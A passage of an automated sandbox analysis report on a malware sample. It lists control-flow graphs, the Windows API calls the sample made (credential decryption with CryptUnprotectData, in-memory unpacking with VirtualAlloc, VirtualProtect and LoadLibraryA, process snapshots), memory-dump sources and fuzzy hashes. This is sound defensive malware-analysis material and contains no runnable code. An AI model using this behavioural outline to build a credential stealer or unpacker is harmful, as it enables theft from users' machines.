• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415BAF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID: CryptDataUnprotect
• String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
• API String ID: 834300711-3328159043
• Opcode ID: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
• Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
• Opcode Fuzzy Hash: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
• Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 272 409580-40958e 273 409aa4 272->273 274 409594-4095ff call 405ee0 call 408020 272->274 276 409aa6-409ab2 273->276 280 409600-409636 274->280 280->280 281 409638-40965f call 408f50 280->281 284 409660-4096af 281->284 284->284 285 4096b1-4096e3 call 408f50 284->285 288 4096f0-40975c 285->288 288->288 289 40975e-409794 call 408f50 288->289 292 4097a0-4097b0 289->292 292->292 293 4097b2-4097bf 292->293 294 4097c0-4097d4 293->294 294->294 295 4097d6-4097f6 call 408f50 294->295 298 409800-40985c 295->298 298->298 299 40985e-409932 call 4091b0 298->299 302 409940-409968 299->302 302->302 303 40996a-409972 302->303 304 409992-40999e 303->304 305 409974-40997f 303->305 307 4099a0-4099a3 304->307 308 4099c2-4099f2 304->308 306 409980-409990 305->306 306->304 306->306 309 4099b0-4099c0 307->309 310 409a00-409a5a 308->310 309->308 309->309 310->310 311 409a5c-409a78 call 40bbd0 310->311 313 409a7d-409aa2 call 408030 311->313 313->276
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: #4<7$+8=>$09DD63BCF4890FFCAC8923850305D13E$PK$Tiec$\$r
• API String ID: 0-4188866626
• Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
• Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
• Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
• Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 316 40acf0-40ad78 317 40ad80-40ad89 316->317 317->317 318 40ad8b-40ad9e 317->318 320 40b012-40b019 318->320 321 40ada5-40ada7 318->321 322 40b0e7-40b0f0 318->322 323 40b0f7-40b0fd 318->323 324 40adac-40afc7 318->324 325 40b09d-40b0b7 318->325 326 40b01e-40b096 call 407f00 318->326 327 40b0ff-40b10a 318->327 330 40b367-40b373 320->330 334 40b351-40b358 321->334 322->323 322->327 332 40b359-40b364 322->332 333 40b0be-40b0e2 call 43dbf0 322->333 336 40b341-40b344 322->336 337 40b1c4-40b1d1 322->337 338 40b268-40b289 call 43dbf0 322->338 339 40b1eb-40b20b 322->339 340 40b22b-40b235 322->340 341 40b330 322->341 342 40b212-40b224 322->342 343 40b332-40b335 322->343 344 40b295-40b2b4 322->344 345 40b2f5-40b31b 322->345 346 40b375 322->346 347 40b2d6-40b2df call 43c180 322->347 348 40b256-40b263 322->348 349 40b1d8-40b1df 322->349 350 40b33c 322->350 351 40b23c-40b254 call 43dbf0 322->351 352 40b37c 322->352 353 40b31d 322->353 328 40b141-40b164 323->328 335 40afd0-40aff2 324->335 325->332 325->333 326->322 326->323 326->325 326->327 326->332 326->333 326->336 326->337 326->338 326->339 326->340 326->341 326->342 326->343 326->344 326->345 326->346 326->347 326->348 326->349 326->350 326->351 326->352 326->353 329 40b110-40b13a 327->329 355 40b170-40b1a1 328->355 329->329 354 40b13c-40b13f 329->354 330->334 332->330 333->332 335->335 360 40aff4-40afff 335->360 368 40b34b 336->368 337->332 337->333 337->338 337->346 337->349 337->352 338->344 339->332 339->333 339->336 339->338 339->340 339->341 339->342 339->343 339->344 339->345 339->346 339->347 339->348 339->349 339->350 339->351 339->352 339->353 340->332 340->333 340->338 340->346 340->348 340->349 340->351 340->352 342->332 342->333 342->336 342->338 342->340 342->341 342->343 342->344 342->345 342->346 342->347 342->348 342->349 342->350 342->351 342->352 342->353 343->332 343->333 343->336 343->338 343->346 343->348 343->349 343->350 343->351 343->352 363 40b2bd-40b2cf 344->363 359 40b322-40b328 345->359 346->352 364 40b2e4-40b2ee 347->364 348->336 349->339 350->336 351->348 372 40b383 352->372 353->359 354->328 355->355 365 40b1a3-40b1bd 355->365 359->341 375 40b002-40b00b 360->375 363->332 363->333 363->336 363->338 363->341 363->343 363->345 363->346 363->347 363->348 363->349 363->350 363->351 363->352 363->353 364->332 364->333 364->336 364->338 364->341 364->343 364->345 364->346 364->348 364->349 364->350 364->351 364->352 364->353 365->332 365->333 365->336 365->337 365->338 365->339 365->340 365->341 365->342 365->343 365->344 365->345 365->346 365->347 365->348 365->349 365->350 365->351 365->352 365->353 368->334 372->372 375->320 375->322 375->323 375->325 375->326 375->327 375->332 375->333 375->336 375->337 375->338 375->339 375->340 375->341 375->342 375->343 375->344 375->345 375->346 375->347 375->348 375->349 375->350 375->351 375->352 375->353
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: &K M$&wXy$'sZu$/O_q$Jk"m$e7o9$h? !
• API String ID: 0-2986092683
• Opcode ID: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
• Instruction ID: 590b8efa2b06f5e02b6b835ab0c7a13339e1eb4ce69d4453d365afcab8c45654
• Opcode Fuzzy Hash: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
• Instruction Fuzzy Hash: D80286B5200B01DFD324CF25D891B97BBF1FB49705F108A2CE5AA8BAA0D775A845CF85

Control-flow Graph
control_flow_graph 385 408850-408861 call 43bc60 388 408867-40888f call 408020 385->388 389 408acf-408ad1 ExitProcess 385->389 392 408890-4088cb 388->392 393 408904-408916 call 4354e0 392->393 394 4088cd-408902 392->394 397 408ab8-408abf 393->397 398 40891c-40893f GetCurrentProcessId GetCurrentThreadId 393->398 394->392 401 408ac1-408ac7 call 408030 397->401 402 408aca call 43c160 397->402 399 408941-408943 398->399 400 408945-408a3b SHGetSpecialFolderPathW GetForegroundWindow 398->400 399->400 404 408a6b-408aac call 409b00 400->404 405 408a3d-408a69 400->405 401->402 402->389 404->397 410 408aae call 40c550 404->410 405->404 412 408ab3 call 40b390 410->412 412->397
APIs
• GetCurrentProcessId.KERNEL32 ref: 0040891C
• GetCurrentThreadId.KERNEL32 ref: 00408925
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
• GetForegroundWindow.USER32 ref: 00408A33
  • Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
  • Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
  • Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7
• ExitProcess.KERNEL32 ref: 00408AD1
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
• String ID:
• API String ID: 3072701918-0
• Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
• Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
• Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
• Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9

Control-flow Graph
control_flow_graph 425 4218a0-42192a call 414400 call 43e340 430 421931-421984 call 4143e0 call 43aa80 425->430 431 42192c 425->431 437 421986-421989 430->437 432 4220f7-422104 431->432 438 4219e7-4219ed 437->438 439 42198b-4219e5 437->439 440 4219ef-4219fa 438->440 439->437 441 421a01-421a17 440->441 442 4219fc 440->442 443 421a19-421aa4 441->443 444 421a1e-421a29 441->444 445 421ab6-421ab9 442->445 447 421aa6-421aaa 443->447 444->447 448 421a2b-421a95 call 43c1f0 444->448 449 421abb 445->449 450 421abd-421ac2 445->450 452 421aae-421ab1 447->452 453 421aac 447->453 456 421a9a-421aa2 448->456 449->450 454 421ac8-421adb 450->454 455 421ff9-422028 call 43aaa0 450->455 452->440 453->445 457 421add-421b19 454->457 463 42202a-42202d 455->463 456->447 460 421b20-421b3d 457->460 461 421b1b 457->461 462 421b3f-421b42 460->462 464 421cde 461->464 465 421b44-421b9a 462->465 466 421b9c-421bbe call 422110 462->466 467 42208b-422090 463->467 468 42202f-422089 463->468 469 421ce0-421ce4 464->469 465->462 466->464 481 421bc4-421be9 466->481 471 422092-422098 467->471 468->463 472 421ce6-421cec 469->472 473 421cee-421d05 call 43aa80 469->473 475 42209a 471->475 476 42209c-4220ae 471->476 477 421d26-421d29 472->477 492 421d07-421d19 473->492 493 421d1e-421d24 473->493 475->432 482 4220b2-4220b8 476->482 483 4220b0 476->483 479 421fd3-421fd8 477->479 480 421d2f-421d4f 477->480 487 421fe3-421fe9 479->487 488 421fda-421fe1 479->488 485 421d51-421d54 480->485 486 421beb-421bee 481->486 490 4220ba 482->490 491 4220bc-4220e8 call 43c1f0 482->491 489 4220eb-4220ee 483->489 494 421d93-421db6 485->494 495 421d56-421d91 485->495 496 421bf0-421c0a 486->496 497 421c0c-421c2d call 422110 486->497 498 421feb 487->498 488->498 500 4220f2-4220f5 489->500 501 4220f0 489->501 490->489 491->489 502 421fed-421fef 492->502 493->477 503 421db8-421dbb 494->503 495->485 496->486 512 421c34-421c4b 497->512 513 421c2f 497->513 498->502 500->471 501->432 502->457 506 421ff5-421ff7 502->506 507 421e19-421e1c 503->507 508 421dbd-421e17 503->508 506->455 511 421e1e-421e29 507->511 508->503 514 421e30-421e46 511->514 515 421e2b 511->515 516 421c4f-421cdc call 408020 call 414050 call 408030 512->516 517 421c4d 512->517 513->469 519 421e48-421ed2 514->519 520 421e4d-421e58 514->520 518 421ee4-421eea 515->518 516->469 517->516 523 421eee-421f0b 518->523 524 421eec 518->524 526 421ed4-421ed8 519->526 520->526 527 421e5a-421ec3 call 43c1f0 520->527 531 421f0d-421f10 523->531 524->523 529 421eda 526->529 530 421edc-421edf 526->530 536 421ec8-421ed0 527->536 529->518 530->511 534 421f12-421f66 531->534 535 421f68-421f6f 531->535 534->531 537 421f71-421f75 535->537 538 421f9f-421fa2 535->538 536->526 542 421f77-421f7e 537->542 539 421fa4-421fbd call 43aaa0 538->539 540 421fbf-421fc4 538->540 544 421fc6-421fc9 539->544 540->544 546 421f80-421f8c 542->546 547 421f8e-421f91 542->547 544->479 549 421fcb-421fd1 544->549 546->542 551 421f93-421f99 547->551 552 421f9b-421f9d 547->552 549->502 551->552 552->538
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: !@$,
• API String ID: 0-2321553346
• Opcode ID: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
• Instruction ID: 02546279eb0c4d83f3c4e3be5ab3571bc15c22c1dfd1b9922496e5385efd982e
• Opcode Fuzzy Hash: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
• Instruction Fuzzy Hash: DB4259B1E042648FDB04CF78D8813AEBFF1AF55310F59826ED895A7391C3798846CB86

Control-flow Graph
control_flow_graph 554 20c07a6-20c07bf 555 20c07c1-20c07c3 554->555 556 20c07ca-20c07d6 CreateToolhelp32Snapshot 555->556 557 20c07c5 555->557 558 20c07d8-20c07de 556->558 559 20c07e6-20c07f3 Module32First 556->559 557->556 558->559 566 20c07e0-20c07e4 558->566 560 20c07fc-20c0804 559->560 561 20c07f5-20c07f6 call 20c0465 559->561 564 20c07fb 561->564 564->560 566->555 566->559
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 020C07CE
• Module32First.KERNEL32(00000000,00000224), ref: 020C07EE
Memory Dump Source
• Source File: 00000000.00000002.1722412139.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20c0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: d96b2f4417ce84138222a2ad4c26a66549524e3a63614b9a8057f41c9d5a29bd
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: 76F0C271500311AFE7203BF5988CB6F76EDAF49665F20023CE642910C0DB70E8059A60
APIs
• LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
• Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: ,+*)
• API String ID: 0-3529585375
• Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
• Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: o`
                                                                                                                                                                                                                                                                • API String ID: 0-3993896143
                                                                                                                                                                                                                                                                • Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                                                                                                                                                                                                                                • Instruction ID: 0bdba0f6bf2b5cd18ae264ba298f37260da84434396a298b3053f459174327b1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C11C270218340AFC310DF65DDC1B6BBFE2DBC2204F65983DE185A72A1C675E9499719
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                                                                                                                                                                                                                                                • Instruction ID: a24f2a78553098ad8a5e3b5bc8abd089333314a4ae9ebed43d08ec28266042c4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D9126B1B04321ABD7209F20DD91B77B3A5EF91318F14482DE9869B381E7B9E904C75A

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 188 20f003c-20f0047 189 20f004c-20f0263 call 20f0a3f call 20f0e0f call 20f0d90 VirtualAlloc 188->189 190 20f0049 188->190 205 20f028b-20f0292 189->205 206 20f0265-20f0289 call 20f0a69 189->206 190->189 208 20f02a1-20f02b0 205->208 210 20f02ce-20f03c2 VirtualProtect call 20f0cce call 20f0ce7 206->210 208->210 211 20f02b2-20f02cc 208->211 217 20f03d1-20f03e0 210->217 211->208 218 20f0439-20f04b8 VirtualFree 217->218 219 20f03e2-20f0437 call 20f0ce7 217->219 221 20f04be-20f04cd 218->221 222 20f05f4-20f05fe 218->222 219->217 224 20f04d3-20f04dd 221->224 225 20f077f-20f0789 222->225 226 20f0604-20f060d 222->226 224->222 230 20f04e3-20f0505 LoadLibraryA 224->230 228 20f078b-20f07a3 225->228 229 20f07a6-20f07b0 225->229 226->225 231 20f0613-20f0637 226->231 228->229 233 20f086e-20f08be LoadLibraryA 229->233 234 20f07b6-20f07cb 229->234 235 20f0517-20f0520 230->235 236 20f0507-20f0515 230->236 232 20f063e-20f0648 231->232 232->225 238 20f064e-20f065a 232->238 244 20f08c7-20f08f9 233->244 239 20f07d2-20f07d5 234->239 237 20f0526-20f0547 235->237 236->237 242 20f054d-20f0550 237->242 238->225 243 20f0660-20f066a 238->243 240 20f07d7-20f07e0 239->240 241 20f0824-20f0833 239->241 245 20f07e4-20f0822 240->245 246 20f07e2 240->246 250 20f0839-20f083c 241->250 247 20f0556-20f056b 242->247 248 20f05e0-20f05ef 242->248 249 20f067a-20f0689 243->249 251 20f08fb-20f0901 244->251 252 20f0902-20f091d 244->252 245->239 246->241 253 20f056f-20f057a 247->253 254 20f056d 247->254 248->224 255 20f068f-20f06b2 249->255 256 20f0750-20f077a 249->256 250->233 257 20f083e-20f0847 250->257 251->252 258 20f057c-20f0599 253->258 259 20f059b-20f05bb 253->259 254->248 260 20f06ef-20f06fc 255->260 261 20f06b4-20f06ed 255->261 
256->232 262 20f084b-20f086c 257->262 263 20f0849 257->263 271 20f05bd-20f05db 258->271 259->271 265 20f06fe-20f0748 260->265 266 20f074b 260->266 261->260 262->250 263->233 265->266 266->249 271->242
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 020F024D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                • Instruction ID: fd96abfbcbc1ba3c88088248ade3727876ff70d63f7c93e0f6d1ce76c48a2d52
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54526A74A01229DFDBA4CF58C984BACBBB1BF09304F1480D9E54DAB756DB30AA85DF14

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 567 20f0e0f-20f0e24 SetErrorMode * 2 568 20f0e2b-20f0e2c 567->568 569 20f0e26 567->569 569->568
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,020F0223,?,?), ref: 020F0E19
                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,020F0223,?,?), ref: 020F0E1E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                • Instruction ID: 373609c7fd307ef06685ff80add0f5f843e46d53b934b4a801672e3e55fe8bac
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6D01231545228B7D7412A94DC09BCD7B5CDF05B66F008011FB0DD9481C770954046E5

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 619 43c2c8-43c2d6 620 43c2e0-43c2fd 619->620 620->620 621 43c2ff-43ccb9 GetForegroundWindow call 43e110 620->621 624 43ccbe-43ccdf 621->624
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 0043CCAF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2020703349-0
                                                                                                                                                                                                                                                                • Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                                                                                                                                                                                                                • Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D
APIs
• RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,0040B2E4,00000000,00000001), ref: 0043C1B2
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
APIs
• RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
APIs
• RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 020C04B6
Memory Dump Source
• Source File: 00000000.00000002.1722412139.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20c0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
